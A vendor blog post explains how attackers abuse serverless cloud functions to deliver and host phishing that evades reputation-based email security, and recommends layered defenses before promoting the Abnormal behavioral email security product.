How Serverless Functions Bypass Email Security and How to Fight Back

Serverless functions give attackers a direct path to host and deliver phishing content through trusted cloud infrastructure. Because these functions run on major cloud platforms, the emails they generate pass authentication checks and the URLs they serve sit on domains that businesses already trust. That combination makes serverless-hosted phishing harder to detect with traditional email security controls, increasing the risk of credential theft and extending the time security teams spend triaging incidents that existing tools miss.

How Serverless Functions Enable Phishing on Trusted Infrastructure

Serverless functions let attackers blend phishing delivery and hosting into normal cloud activity. Four properties make this model effective:

• Trusted Sending Paths: Cloud workflows send messages through legitimate provider infrastructure, passing SPF, DKIM, and DMARC. Emails mimic file-sharing prompts, service notifications, or voicemail alerts that employees already see.
• Trusted URL Hosting: Phishing pages sit on cloud-provider subdomains that businesses rely on for normal operations, making broad blocking impractical. A phishing page inherits platform reputation even when created minutes earlier.
• Dynamic Content Delivery: Serverless code tailors responses based on visitor, timing, or request context. Sandboxes receive harmless content while intended victims see login prompts, and attackers swap content after delivery without changing the visible link.
• Short-Lived Infrastructure: Functions spin up and disappear before reputation systems score them. Pages vanish before analysts complete review, and limited reuse reduces the value of static blocklists.

These properties explain why serverless-hosted phishing looks technically legitimate while driving credential theft. Authentication alone does not address this risk, and domain-level trust says little about a single page created for a phishing campaign. Defenders need page-level context and post-delivery visibility to make reliable decisions.

Real Campaigns Show Serverless Email Threats Are Active

Cloud-hosted phishing and serverless execution already appear in active attack chains. CISA's advisory on Scattered Spider documents the group's use of phishing, credential theft, and abuse of cloud environments, including tactics consistent with provider-managed infrastructure and valid-account misuse.

The advisory highlights three patterns:

• Trusted Services Matter: Attackers do not need obviously malicious infrastructure when valid accounts and cloud services support delivery and hosting.
• Short Campaigns Work: Temporary hosted pages collect credentials before blocklists or reports catch up.
• Cross-Layer Analysis Strengthens Detection: Identity, cloud entitlements, email analysis, and user reporting all contribute to detection and response.

Organizations investigating serverless phishing incidents need to ask whether the sender, link destination, and requested action make sense together, beyond checking whether the infrastructure appears legitimate.

Why Serverless Phishing Challenges Email Security

Serverless phishing weakens broad reputation signals and compresses the time defenders have to assess intent. These limitations directly affect detection rates, analyst workload, and mean time to respond:

• Reputation Is Broad: Provider reputation reflects the platform overall, not the individual page or function the attacker created. This gap produces false negatives that reach employee inboxes.
• Inspection Is Momentary: A safe-looking response during scanning changes after delivery once the backend logic updates. Analysts spend cycles investigating links that no longer match the original threat.
• Context Is Limited: Message metadata alone does not indicate whether the requested action fits the normal relationship between sender and recipient, resulting in alerts that lack the context needed for confident triage.

Email gateways (SEGs) evaluate sender domains, IPs, and embedded links against reputation data, and that approach still works for many commodity campaigns. The challenge is that a trusted cloud domain hosts both legitimate business applications and serverless phishing pages created moments earlier, making reputation-based checks alone less effective for this attack type.

Analysts gain more value from evaluating message intent: Does the request match the sender's normal workflow? Does the recipient usually handle this type of approval, login, or document? Does the message create urgency that feels out of pattern? Serverless phishing slips past controls that prioritize technical legitimacy over business context.

Post-delivery visibility also matters. Attackers serve benign content during pre-delivery scanning and update the serverless function logic later. User reports arrive after the phishing page has changed or disappeared, and HTML patterns and hashes lose value quickly. Post-delivery review and retrospective controls address these gaps.

Defensive Strategies for Serverless-Based Email Threats

The most effective defenses against serverless phishing reduce attacker opportunity across identity, cloud administration, and link access. These measures target different stages of the attack flow and work best together:

• Hardening Authentication: CISA's FIDO MFA implementation report recommends phishing-resistant methods, such as FIDO2, to protect access to sensitive systems. Phishing-resistant MFA breaks the attack path after the click, even when the URL sits on a legitimate cloud domain, directly reducing the risk of credential compromise from serverless-hosted campaigns.
• Restricting Deployment Permissions: Cloud entitlements determine whether a compromised account can serve as a phishing platform. Periodic reviews, just-in-time access, and approval controls around workflow automation reduce that risk while producing audit-ready records of who can create and modify serverless resources.
• Improving URL Analysis: CISA's phishing defense guidance recommends layered defenses, including URL evaluation. Inspection logic focused on redirect chains, credential prompts, and form actions identifies suspicious use of legitimate cloud domains without generating noise from normal business applications.
• Enabling Protective DNS: CISA recommends protective DNS for phishing to block requests to known malicious domains and catch downstream domains in redirect chains. Its role is secondary when the parent cloud domain is widely trusted, but it adds value as a layer within a broader control set.

Detecting Serverless Email Threats With Behavioral Context

Behavioral context identifies serverless email threats when infrastructure signals look legitimate. The strongest detection question is simple: does this email fit the sender's normal pattern and the recipient's expected workflow?

High-value signals guide analyst decisions:

• Workflow Mismatch: The message asks for an action outside the sender's normal business process.
• Recipient Mismatch: The request targets someone who does not handle that document, approval, or login path.
• Timing Mismatch: The email creates urgency or arrives outside the normal communication cadence for that sender relationship.

Where signature-based detection often struggles with serverless phishing because content and indicators change rapidly, behavioral analysis evaluates the relationship and context behind each message, making it more resilient to dynamic attack infrastructure. For security teams, that translates to fewer false negatives on cloud-hosted threats and more accurate alert prioritization, reducing the time analysts spend on inconclusive triage.

This is where behavioral AI for email enhances the effectiveness of existing email security. Abnormal applies behavioral AI to cloud email and related account signals, helping security teams surface suspicious messages based on communication patterns, workflow cadence, recipient behavior, and message intent.

That additional layer fills a gap that reputation and signature-based tools often leave open, catching serverless phishing attacks that bypass existing defenses while reducing false positives through richer behavioral context. Abnormal integrates seamlessly with existing email infrastructure to enhance native defenses and email gateways (SEGs), deploying without architectural changes, strengthening detection coverage, and minimizing additional operational burden.

How to Strengthen Defenses Against Serverless Phishing

Serverless phishing raises the value of identity hardening, cloud governance, and behavior-based email analysis. A practical response includes three priorities:

• Tighten Cloud Administration: Limit who can publish serverless functions, workflows, and hosted pages.
• Improve Click-Time Analysis: Review cloud-hosted links for redirect behavior, credential prompts, and page-level risk.
• Add Behavioral Context: Evaluate whether the message fits normal business activity even when the infrastructure appears legitimate.

When those controls work together, organizations reduce exposure without over-relying on any single signal. Recognized as a Leader in the Gartner® Magic Quadrant™, Abnormal enhances existing email defenses to detect advanced threats that traditional controls often miss.

Book a demo to see how Abnormal detects cloud-hosted email threats that evade traditional defenses.